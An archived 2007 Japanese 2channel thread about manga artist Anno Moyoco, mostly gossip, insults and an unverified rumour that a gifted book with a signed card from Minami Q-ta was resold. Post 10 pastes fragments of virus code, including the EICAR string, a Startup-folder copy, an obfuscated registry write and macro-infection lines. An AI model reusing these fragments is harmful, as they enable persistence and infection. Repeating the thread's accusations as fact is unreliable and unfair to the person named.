2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

安野モヨコ 18

1 :花と名無しさん:2007/01/10(水) 02:31:41 ID:???0
最新情報は随時公式サイトにてチェック
ttp://www.plays.jp/diary/moyoco/

★「モーニング」にて『働きマン』連載中
★「なかよし」にて『シュガシュガルーン』連載中
★さくらん映画化 07年春公開予定

※安野氏はとても感受性が強い為、
ネットでの叩きが目に入るとモチベーションが下がることがあります。
無駄な暴言は控え、批判は建設的に。
外見の話題は、スレを無益に消費しループになるのでほどほどに。
(過去ログでおなかいっぱい)

前スレ
安野モヨコ 17
http://comic7.2ch.net/test/read.cgi/gcomic/1159005931/


2 :花と名無しさん:2007/01/10(水) 02:32:54 ID:???0
前スレdat落ちしてたので建てた

3 :花と名無しさん:2007/01/10(水) 03:00:19 ID:???O
>>1
乙でした

つピンクのハート
↑これあげる

4 :花と名無しさん:2007/01/10(水) 03:47:13 ID:???0
>>1
乙!

じゃあ私は
つオレンジのハート

モヨコのスレっていつも1000行く前にdat落ちしちゃうような
イメージ。何でかな。

5 :花と名無しさん:2007/01/10(水) 10:48:52 ID:???0
>>1


>>4
>>980超えたら自動的に落ちるじゃん
だからdat落ちとは違う気が

6 :花と名無しさん:2007/01/10(水) 12:10:17 ID:???O
講談社、グラマラス(?)でのインタビューで、私に憧れてきた女の子に、二十代のうちに私と同じぐらい夢中に働いて来たかと言いたいとか言うような発言があったけど、この発言でモヨ嫌いになりました。どれだけなんだよ、この女

7 :花と名無しさん:2007/01/10(水) 12:51:02 ID:???0
質より量って感じだからなモヨは
束憧れてる女の子が居ると思ってるんだねめでたいなーwww

8 :花と名無しさん:2007/01/10(水) 13:22:22 ID:???0
そりゃ中にはいるでしょ。
幼稚な娘から見たらカリスマ(プッ!)

9 :花と名無しさん:2007/01/10(水) 13:41:29 ID:???0
安野モヨコに憧れてる時点でアレだよな
強烈な妄想が生み出した作り話かもしれないし

10 :花と名無しさん:2007/01/10(水) 16:27:13 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


11 :花と名無しさん:2007/01/10(水) 16:49:30 ID:???0
早速スクリプトかよw

12 :花と名無しさん:2007/01/10(水) 17:10:29 ID:???0
晒しage

13 :花と名無しさん:2007/01/11(木) 03:28:43 ID:???O
〉〉6
皆、それぞれ悩みや不安抱えたり、一生懸命しながら、いきてるっつうの。この女はそれすらわかってない

14 :花と名無しさん:2007/01/11(木) 13:06:19 ID:???0
>>13
要するに「自分大好き」なんだろ、モヨは。

15 :花と名無しさん:2007/01/12(金) 10:39:04 ID:???0
グラマラス読んで怒りのあまりここにきました。ウィルスにも負けない。
「みんな私をうらやましがるけど〜」という発言があって、本当がっかりした。
本当にこう思っているなら、電波だな。
自分以外の人間は、全員なまけものでダメ女なんだろう。
働きマンが説教臭くなるのも無理はないよ。

16 :花と名無しさん:2007/01/12(金) 11:00:19 ID:???0
>>15
2ちゃんブラウザ使っても反応するウイルスコード?
もしまだなら2ちゃんブラウザ使ってみたらどうだろう

17 :花と名無しさん:2007/01/15(月) 16:19:41 ID:???0
【文化】 30代独身女性がハマる「自分磨き本」
http://news22.2ch.net/test/read.cgi/newsplus/1168841734/

こういう女が安野の漫画読むんだろうな

18 :花と名無しさん:2007/01/15(月) 18:17:55 ID:???0
>>13
おまえのアンカーは専ブラでも反応しない

19 :花と名無しさん:2007/01/15(月) 18:39:17 ID:???0
シュガルン7発売してたんだな
買ってみたけどやっぱ微妙だったorz

20 :花と名無しさん:2007/01/15(月) 19:36:51 ID:???0
>>18
自分の使ってる專ブラではアンカーになるよ
新しめの專ブラ使ってみるとか?

>>19
絵はそこらに転がってる物のツギハギだし、
決定的なのはこの作者が話作りが下手クソだって事だな
自分の身の回りの小さな話を活かして面白おかしく仕立てる力は
働きマンとかハピマニでそこそこ見せてるけど
大きな話を作ろうとすると途端にボロが出る
目の前で起きてる事に対するその時々の気分を
ランダムに綴る以外の話作りが出来ない人なんだと思う

21 :花と名無しさん:2007/01/19(金) 11:11:56 ID:???0
542 :名無しんぼ@お腹いっぱい :2007/01/19(金) 11:00:54 ID:4iY2ciQl0
南Q太を語るスレ。
http://comic7.2ch.net/test/read.cgi/gcomic/1121162500/701

701 名前:花と名無しさん[sage] 投稿日:2007/01/19(金) 01:19:14 ID:???O
どこに書こうか迷ったんだけど。
2年くらい前に、中目黒のブコフで、『天井の下』を買った。家に帰って、ページを開いてびっくり。
安野モヨコにあてた、あの字体のQ太直筆、ウオレス&グルミットのポストカードが出て来た。

『安野モヨコさま
先日はステキなパーティーにお招き下さってありがとうございました(ハートマーク)
南Q太』

多分パーティーって結婚パーティーだろうな、時期的に。
貰った漫画を、ブコフに持っていくモヨコにひどく驚いたあの日…

22 :花と名無しさん:2007/01/19(金) 20:21:30 ID:???0
ブコフ毛嫌いしてる癖に自分は人から貰った漫画さえも売るのかwww
モヨあんた人として終わってるよ

23 :花と名無しさん:2007/01/20(土) 00:53:55 ID:9+078JsaO
ジェリーインザメリーゴーラウンドは大好きだったのにな。
今の安野モヨコが描いたと思えない。
お金持ちになると人間変わっちゃうのかな。
モヨって結局ステータス主義なのかなー。

24 :花と名無しさん:2007/01/20(土) 01:20:38 ID:???O
人にもらった本を売るのも神経疑うけど、漫画なんか売っても小銭にしかならないのにわざわざ売るのが貧乏くさい。
そんなに邪魔なら捨てればいいのに

25 :花と名無しさん:2007/01/20(土) 02:54:37 ID:???O
ネタじゃなくて本当!?

26 :花と名無しさん:2007/01/20(土) 03:07:52 ID:???0
実話だとしたら二重三重にイタい話だ…。
言い訳出来る余地が全くない。

27 :花と名無しさん:2007/01/20(土) 04:18:35 ID:2s46kaSE0
ひどいー失礼でしょあんの

28 :花と名無しさん:2007/01/20(土) 09:56:11 ID:???0
ネタっぽいし信じてないけど、モヨならありえそうw

29 :花と名無しさん:2007/01/20(土) 10:25:04 ID:???0
>>28

549 名前: 名無しんぼ@お腹いっぱい Mail: sage 投稿日: 2007/01/20(土) 06:59:14 ID: kDcaxfjbO
Q太スレにいた701です。早速コピペされているとは…
モヨコ絡みだし、このまま私だけが所有してお蔵入りも勿体ない気が若干するので…w
どうぞつhttp://m.pic.to/6cedu
ピクトはじめてだったので、不具合があったら申し訳ありません。

30 :花と名無しさん:2007/01/20(土) 12:06:48 ID:???O
>>29
南Q太に送り返してみれば?

31 :花と名無しさん:2007/01/20(土) 12:09:23 ID:???0
29に言ってもどうにもならんと思うが

32 :花と名無しさん:2007/01/20(土) 12:37:00 ID:???0
今回ばかりは同情の余地なしですなー
人から貰ったもん(中も見ずに)売っぱらうモヨコ凄いよ!


33 :花と名無しさん:2007/01/20(土) 12:55:16 ID:???O
あっごめん。>>30さん、南Q太に送り返してみたらどうかな。
せっかくあげた本をモヨコが売っぱらったことを教えた方がいいよ。

34 :花と名無しさん:2007/01/20(土) 13:01:17 ID:???0
>>29
ネタですね。誰がが捏造したかはしれないけど。
信じてる人間がいるのにびっくり。

35 :花と名無しさん:2007/01/20(土) 13:10:52 ID:???0
ネタだと言う証拠は無いし
本当だと言う証拠も無い
ただ、この話題に対して信じる人が多いと言う事は
安野モヨコがそういうイメージで見られてる
証拠かも知れないとは思う

36 :花と名無しさん:2007/01/20(土) 13:14:14 ID:???O
捏造して、誰になんのメリットがw??

37 :花と名無しさん:2007/01/20(土) 13:19:01 ID:???0
ネタだと言い切れるのって真相知ってる本人だけだよな。
>>34は本人じゃない限りただのキチガイだわ。

38 :花と名無しさん:2007/01/20(土) 13:30:22 ID:???0
>>29
モヨ(ノ∀`)アチャー
これをしったら南Q太は……

39 :花と名無しさん:2007/01/20(土) 13:33:13 ID:???0
常識的に考えてネタだと思うけどね・・・

わざわざブコフに貰った漫画売りに行くような人間だとは思わないなあ。
しかも一切目も通さずとか。特別仲良くなくったって、付き合い上中身の確認ぐらいするでしょ。
誠意があるなし以前に、そういうところは見栄とか気にしそうなタイプだし。

40 :花と名無しさん:2007/01/20(土) 13:35:17 ID:???0
だからネタだったら誰にメリットがあんだよw
態々Q太の筆跡まで真似て書くわけ?

41 :花と名無しさん:2007/01/20(土) 13:37:16 ID:???0
ヤベー(((( ;゚д゚)))アワワワワ←今の安野の心情

42 :花と名無しさん:2007/01/20(土) 13:38:43 ID:???0
1.ブックオフが嫌いと言いつつ利用

2.知人からのプレゼントを売却

3.しかもメッセージカード入れっ放し

4.よって、全く読んでない可能性高し

5.売ったところで交通費になるかどうかも
 わからない金額なのに、わざわざ売るがめつさ

43 :花と名無しさん:2007/01/20(土) 13:49:21 ID:???0
常識なんて人によって違うわけで・・・。
モヨコの日記見ただけでもわかるじゃん。
バレないと思ってやっちまったのかもよ。
小間使いさせてるアシスタントに
売り払わせたのかも知れないし、
モヨコが人にあげちゃって、それを
また面白がって売った人がいるかもだし。

44 :花と名無しさん:2007/01/20(土) 13:50:30 ID:???0
どっちにしろ最低なのは変わりないwwwww

45 :Q太スレ701:2007/01/20(土) 13:55:56 ID:???O
画像を貼った者です。

正直、安野モヨコに対してはやたら自分が露出したがるひと、くらいの印象しかなかったのですが…書き込んでからスレッドを読んで、ずいぶん印象が変わりました。
しかし、こんな手のこんだ捏造をされなければいけないような人なんでしょうか…?
Q太は、昔から好きなので字体に間違いはないと思います。
捏造かぁ…本を買ってから2年間、考えてもみなかったなぁ…

46 :花と名無しさん:2007/01/20(土) 13:56:27 ID:???0
献本なんて腐るほど来るんだから
こんなこともあるだろうよ
捨てるよりリサイクルしたほうがマシだろうが
アホか


47 :花と名無しさん:2007/01/20(土) 13:59:20 ID:???0
贈られた物をどうしようが
贈られた人間の勝手なのは間違いないが、
やり方が酷過ぎる
頭悪過ぎ

48 :花と名無しさん:2007/01/20(土) 13:59:22 ID:???0
リサイクルするにしたって人から貰ったもの中身も見ないで売りに出すのは人としておかしい

49 :花と名無しさん:2007/01/20(土) 14:00:40 ID:???0
>>46
モヨ工作員昼間から必死だなwwwwwwwwwwwwww

50 :花と名無しさん:2007/01/20(土) 14:01:48 ID:???0
>>46
そうだね
大嫌いなブックオフでリサイクルするなんて
モヨコは偉いよねwww
メッセージ入りのポストカードまで余さずリサイクル♪

51 :花と名無しさん:2007/01/20(土) 14:06:47 ID:???0
リサイクルするならモヨの大好きな
ホコリまみれの古本屋にすればいいじゃん。
わざわざ嫌いなブクオフに売る理由って何だ?

52 :花と名無しさん:2007/01/20(土) 14:08:14 ID:???0
手近だったんじゃないの?

53 :花と名無しさん:2007/01/20(土) 14:10:35 ID:???0
漫画家ならブックオフ好きな奴はいないだろ


54 :花と名無しさん:2007/01/20(土) 14:13:50 ID:???0
建前上はね

55 :花と名無しさん:2007/01/20(土) 14:15:30 ID:???0
>>53
それをわざわざ嫌いと発言する奴も珍しいけどな

56 :花と名無しさん:2007/01/20(土) 15:29:11 ID:???0
南キュー太は大勢いる安野に似たオサレ系の一人で
しかも家には大量の参考用マンガ本があるんでしょ
間違えて処分したとしても不思議じゃないよ
つまりわざとじゃない

57 :花と名無しさん:2007/01/20(土) 15:30:55 ID:???0
いまの安野さんならこのスレ見たら
南Q太全集買ってQ太に
「楽しく拝見しましたワ」とかメールして終わり。
おおごとにしようとしてる人がいるみたいだけどねー

58 :花と名無しさん:2007/01/20(土) 15:35:05 ID:???0
>>56-57
ネタじゃないなら言わせてくれ

「 お ま え バ カ だ ろ 」

59 :花と名無しさん:2007/01/20(土) 15:43:08 ID:???0


60 :花と名無しさん:2007/01/20(土) 16:02:34 ID:???0
なんで安野がQ太全集買ってメールすんだよwww
わけわかんねえw

61 :花と名無しさん:2007/01/20(土) 16:28:24 ID:???O
モヨコはセレブ気取りの勘違い女

62 :花と名無しさん:2007/01/20(土) 17:32:16 ID:???O
ブックオフの店員さんは買い取りの際、
パラパラっともしないんですかね?

63 :花と名無しさん:2007/01/20(土) 17:43:08 ID:???0
>>56-57
m9(^Д^)プギャーーーッ

64 :花と名無しさん:2007/01/21(日) 14:46:07 ID:???0
復活

65 :花と名無しさん:2007/01/21(日) 14:57:19 ID:???0
> 逆に考えるんだ!
モヨコに出そうと思ってた手紙を、出すのを忘れたまま自分の本に挟んでおいてそのままブコフ行…。

この可能性もあるよね。
Q太がカード入ったままうっかり
家にたまった献本をうっぱらったとか。
こっちのほうがありえそうじゃない?

あるいは、Q太がカードをはさんだのを失念したまま
自分の本をあまり親しくない人間にあげてしまって
そいつが禄に見もせずにうっぱらった。

66 :花と名無しさん:2007/01/21(日) 14:58:36 ID:???0
ま、ホシが誰でも漫画家は忙しくて
カードがはいってるかどうかチェックなんかしないよ。
カード入りは家宝にすべし!!^^

67 :花と名無しさん:2007/01/21(日) 15:02:54 ID:/bLGEgsL0
イイヨ、イイヨー、

この貧乏臭さがモヨコ的w


68 :花と名無しさん:2007/01/21(日) 15:12:19 ID:???0
おまいらがさわいだって
鼻にもかけられないちゅーねん。

69 :花と名無しさん:2007/01/21(日) 15:42:53 ID:???0
モヨ事務所はピックルでも雇ってるのかねw

70 :花と名無しさん:2007/01/21(日) 15:47:32 ID:???0
>>68
別にモヨコに関わられたくもないが。
こっちは消費者ってだけだし。

本を売ってもいいけど、葉書とか信書・カード類までほうって捨てとく
タイプなんだな。
酷い話だなーと、こういうのが噂になるだけなんじゃない?
商売で生きてる割にそこは間抜けだなと思う。


71 :花と名無しさん:2007/01/21(日) 16:24:08 ID:???0
ファンレター届いても、読まずにまとめて焼却所行き?

72 :花と名無しさん:2007/01/21(日) 16:59:02 ID:???0
ブックオフって家に取りに来るから
それつかったんじゃない?
それ使うとチェックがちょっと甘くなる気がする
自分は以前利用した時売るつもりがない本まで
売ってしまったことがある。

73 :花と名無しさん:2007/01/21(日) 17:07:14 ID:???0
モヨコ必死だなww

74 :花と名無しさん:2007/01/21(日) 17:26:20 ID:iZkJMTN9O
ほんとに必死だな。モヨコ

75 :花と名無しさん:2007/01/21(日) 19:17:13 ID:pOkMJ8490
誰かQたに言ってあげて

76 :花と名無しさん:2007/01/21(日) 20:24:03 ID:???0
moyokoをかばってる人がいるけど、普通ありえない行為でしょ!?
せめて貰ったらその日に中読むくらいすればいいのに、
人間としてどうなのかなぁ?
誰か文春か、そのライバルの朝日とかにこのネタちくって下さい(笑)。
朝日とかポストとかだったら、「文春で連載してるmoyokoのー」
って小さな記事にしてくれないかな!?

77 :花と名無しさん:2007/01/21(日) 21:14:00 ID:???0
MIYOCOとかけてるの?w

78 :花と名無しさん:2007/01/21(日) 22:05:43 ID:???O
>>76
かばってる人は、モヨコ本人から売った証拠がないから
頭ごなしに言えないよな〜と思ってる方々だと思う。

79 :花と名無しさん:2007/01/21(日) 22:22:01 ID:???0
証拠持ってる本人が新潮なり南さんなりに持ち込めば
いい話じゃないの?

80 :花と名無しさん:2007/01/21(日) 22:59:46 ID:???0
結局、こういうネタが出たとき
「ああ、モヨならやるわな」と思われちゃうあたりが
今のモヨに抱いてるここの住人のイメージなんだよな。
本人の普段の言動がこういう結果を招くんだろうな

81 :花と名無しさん:2007/01/21(日) 23:02:35 ID:???0
2chで楽しむ分にはいいけど
この程度のネタ記事になるわけないだろ・・・

82 :花と名無しさん:2007/01/21(日) 23:11:19 ID:???0
安野が超大物だったらネタとして価値あるだろうけど
たかが安野だからなあ…
なんにしても頭の悪い事件だ

83 :花と名無しさん:2007/01/21(日) 23:27:21 ID:???0
ファンレターの返事もらった人も聞いた事ないんだよねー
今ならともかく、売れてない頃だって送られてきただろうに

84 :花と名無しさん:2007/01/22(月) 00:00:57 ID:???0
やっちまったまもんは言い訳できないと思うんだが…。
本人以外にかばう必要もなし。
だって以前日記で「ブックオフ大嫌い。昔の貸し本屋は好き。
なぜなら貸し本屋は雰囲気がいいけど、ブックオフは蛍光灯だから雰囲気がよくない」っていう
頭悪い宣言してるんだよ。そこにわざわざ…。
しかも、いただいたものを改めもせずっていうのは人間としてがさつ過ぎると思う。
弁解の余地ナシ。

85 :花と名無しさん:2007/01/22(月) 00:04:30 ID:???0
実際がさつなんじゃないの?
それで自分のがさつさを恨むわけでもなく
周囲の人間にその時思った恨み言を安易にぶつけてんだよ
後のことも考えずにね。

86 :花と名無しさん:2007/01/22(月) 00:21:48 ID:nbPWcaTH0
逆(誰か作家が安野のカード入れっぱなしでブコフ行き)だったらぜったい
鼻息荒くして激怒してるとこだよねwwwww
ほんとうに頭悪い。
2ちゃんでさらされるくらいがちょうどいい漫画家だよ。

87 :花と名無しさん:2007/01/22(月) 00:34:26 ID:???0
モヨがここまで最低の人間だとは思わなかった…。
他人に厳しく自分に甘いにもほどがある。

88 :花と名無しさん:2007/01/22(月) 01:08:38 ID:???0
こういうの見るたび、つくづく2ちゃんと相性のいい漫画家だなーと思う。
本人はコンプレックスの塊のようなタイプだから、そういうところも含めて
2ちゃんが大嫌いなんだろうケド。

89 :花と名無しさん:2007/01/22(月) 02:19:43 ID:???O
9日の日記って本人かな?
よくみてたけど最近まで12/27までで更新されてなかったのに。

90 :花と名無しさん:2007/01/22(月) 03:42:48 ID:???0
>日記

本人が書いても
スタッフが書いても
日本語が変だよな

91 :花と名無しさん:2007/01/22(月) 06:50:27 ID:???0
>>88
コンプレックスに負けないくらいのプライドwもあるから
ここまで痛々しい言動ができるんだろうね

92 :花と名無しさん:2007/01/22(月) 12:36:17 ID:DQU8Rf9FO
>>62 自分はブクオフで買った時に、中に手紙がはいってた事がある。

93 :花と名無しさん:2007/01/22(月) 16:26:13 ID:jHVbbYg90
ブクオフではなく○オで買った漫画に
給料明細が入っていた事がある…
善良な一市民である自分は、
まじまじと見てからちりぢりに破って捨てた。

94 :花と名無しさん:2007/01/22(月) 17:09:09 ID:???0
モヨ本人が売りに行った可能性は少ないだろうけど、
Qにもらって中見ずに誰かにポンとあげてそのまま売られたんだろうな。
何にしろ失礼な話だ。パラ見くらいすればいいのに。


95 :花と名無しさん:2007/01/22(月) 17:28:47 ID:???0
ファンだったけどどんどん嫌いになっていく…肝心の漫画自体も面白くないし

96 :花と名無しさん:2007/01/22(月) 17:33:27 ID:???0
>>94が正解でしょうな。


97 :花と名無しさん:2007/01/22(月) 17:35:18 ID:???0
>>94
だったら貰った人も中身みないで売ってるのかよw
類友だな

98 :花と名無しさん:2007/01/22(月) 17:46:56 ID:???0
>>97
つまりそういうこと。

99 :花と名無しさん:2007/01/22(月) 18:51:43 ID:???0
貧乏アシ達が貰って、そのまま売った可能性もあるよねー

100 :花と名無しさん:2007/01/22(月) 19:12:28 ID:aXxw4Fi+O
それでも、人から貰ったものをチラ見もせずに…。
サイアクなのにはかわりない。

101 :花と名無しさん:2007/01/22(月) 20:02:43 ID:???0
モヨ格好悪い

102 :花と名無しさん:2007/01/22(月) 21:16:29 ID:???0
私もブクオフで買った時、写真入ってて焦ったことある。
でもこれはなんか価値がありそうだからいいじゃんw
いらないものBOX作っててアシにこずかいにすれば?って
言って箱ごとあげたとみた。



103 :花と名無しさん:2007/01/22(月) 21:52:08 ID:???0
真相を知っているんだけど、くわしく言うと身ばれするから
そこんとこは言えない。
ひとつだけ言うと、モヨコサンは無関係ですよ。

104 :花と名無しさん:2007/01/22(月) 22:04:49 ID:???0
詳しくいえないなら書き込むな( ゚д゚)、ペッ

105 :花と名無しさん:2007/01/22(月) 22:26:56 ID:EwPYCK+rO
>>105
真相ねぇ…本当にモヨコに対する疑いを晴らしたければ書けばw?

106 :花と名無しさん:2007/01/22(月) 22:27:48 ID:EwPYCK+rO
自分にレスしちまった…>>103

107 :花と名無しさん:2007/01/23(火) 00:49:30 ID:???0
モヨコ火消しに必死だな…
ヘタに消そうとすると炎上するよwww

108 :花と名無しさん:2007/01/23(火) 00:58:34 ID:???0
>>103
俺にだけこっそり教えてくれ。
教えてくれたら、俺が真相を広めてやるから。

109 :花と名無しさん:2007/01/23(火) 00:59:13 ID:???O
画像所持者が許せばウィキに載せるかw

110 :花と名無しさん:2007/01/23(火) 01:23:08 ID:???0
ほんとに、モヨコ必死すぎるwwww

111 :花と名無しさん:2007/01/23(火) 01:30:57 ID:???0
>>76
うーんでもこういうレス見ると
嫌われてるみたいだからこういうねつ造とか
するねらーとかがいてもおかしくないとも思うんだよな…。
このスレだけ見るとなんともとれる。
しかしこんなに嫌われてる漫画家だと思わなかった。
周りで読んでる人からは漫画は評判だったからあまりの
叩かれようにべっくりした。
まあエッセイとかまで買うような、
そんなにファンって人もいないんだけど。

112 :花と名無しさん:2007/01/23(火) 01:33:31 ID:???0
2ちゃんねらだからね。
こういうネガティブなネタには食い付く食い付くw
なんていうかホント、低レベルだネ!

113 :花と名無しさん:2007/01/23(火) 01:56:43 ID:???0
ねつ造とか、こう考えてみたらどうだろう本人悪くないヨ!とか…
必死の取り繕いがイタイ。
作者が低レベルなことしたんだから、しょうがないじゃん。

114 :花と名無しさん:2007/01/23(火) 02:28:28 ID:???0
擁護するわけじゃないけど。
引越し、転居時に誤ってブコフ行きになった本って可能性とかも考えられるしね・・・
決め付けで罵倒しまくるのって、どうかと思うんだけど。

あ、自分も引越し時に大量の書籍をゴミに出すのがしんどいから
ブコフに引き取りに来てもらったことあるんで
何となくそう思ったんだけどね。本人乙とか言われるんでしょうか。

ホントに分かって売っぱらったんだとしたら、さすがに引くけど・・・
でもQ太がモヨにとって、嫌いな相手だったとしたら納得はできる。


115 :花と名無しさん:2007/01/23(火) 04:13:56 ID:7A+dQCA30
>でもQ太がモヨにとって、嫌いな相手だったとしたら納得はできる。

モヨおつ

116 :花と名無しさん:2007/01/23(火) 04:34:19 ID:???0
ブクオフ大嫌い宣言しちゃってるからなあ・・・
例えば捏造だとしても、モヨがどんな人間だと思われてるかが
今回の件でよ〜くわかったよ
普段から慕われてる作家だったらもっと擁護してくれる人も
いただろうに、こういう時に今までの行いが効いてくるんだね

117 :花と名無しさん:2007/01/23(火) 19:21:40 ID:???0
ファンに対しては前科が色々あるからねこの人
本業の漫画が面白ければまだしも…

118 :花と名無しさん:2007/01/23(火) 20:24:29 ID:???O
普通に漫画かいてるなら、
ブコフ嫌い発言してるから本人が売ったわけじゃないだろう。
って書かれるんだろうなぁ。
まぁ私は>>103を信じるよ。
すがる思いでw

119 :花と名無しさん:2007/01/23(火) 21:50:13 ID:???0
別の古本屋に売ったらブックオフにも流れた
って可能性は大いにあるけどな

120 :花と名無しさん:2007/01/23(火) 21:55:41 ID:???0
ハガキ大のメッセージカード見落とすって
どんだけガサツなんだ

121 :花と名無しさん:2007/01/24(水) 00:28:57 ID:???0
Q太さんの書き損じってことは

・・・なさそうですかそうですか

122 :花と名無しさん:2007/01/24(水) 00:41:04 ID:JZnGbQWh0
きゅうたに謝れ

123 :花と名無しさん:2007/01/24(水) 01:16:39 ID:???0
ごめんなさい。でも開けるのめんどくさかったの

124 :花と名無しさん:2007/01/24(水) 01:21:31 ID:???0
シュガシュガルーンってこの人の漫画だったの?!
うそお〜超意外。
働きマンは好きだけど出版社って共感しづらいな

125 :花と名無しさん:2007/01/24(水) 01:31:30 ID:???0
何なら共感しやすいの?

126 :花と名無しさん:2007/01/24(水) 02:51:36 ID:???0
さくらんの映画の記事見て、
蜷川ミカ監督土屋アンナ主役
林檎が音楽監督で兄弟で唄わせて…って
田中の女版みたいな人が妄想膨らませて
企画考えてるのが浮かんだw

127 :花と名無しさん:2007/01/24(水) 21:28:35 ID:???0
安野ってブサイク

128 :花と名無しさん:2007/01/24(水) 22:21:15 ID:???O
容姿叩きはもうお腹一杯。

129 :花と名無しさん:2007/01/24(水) 23:30:52 ID:???0
【安野モヨコ】この人物のオモテとウラ
http://news20.2ch.net/test/read.cgi/news/1169640795/


27 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)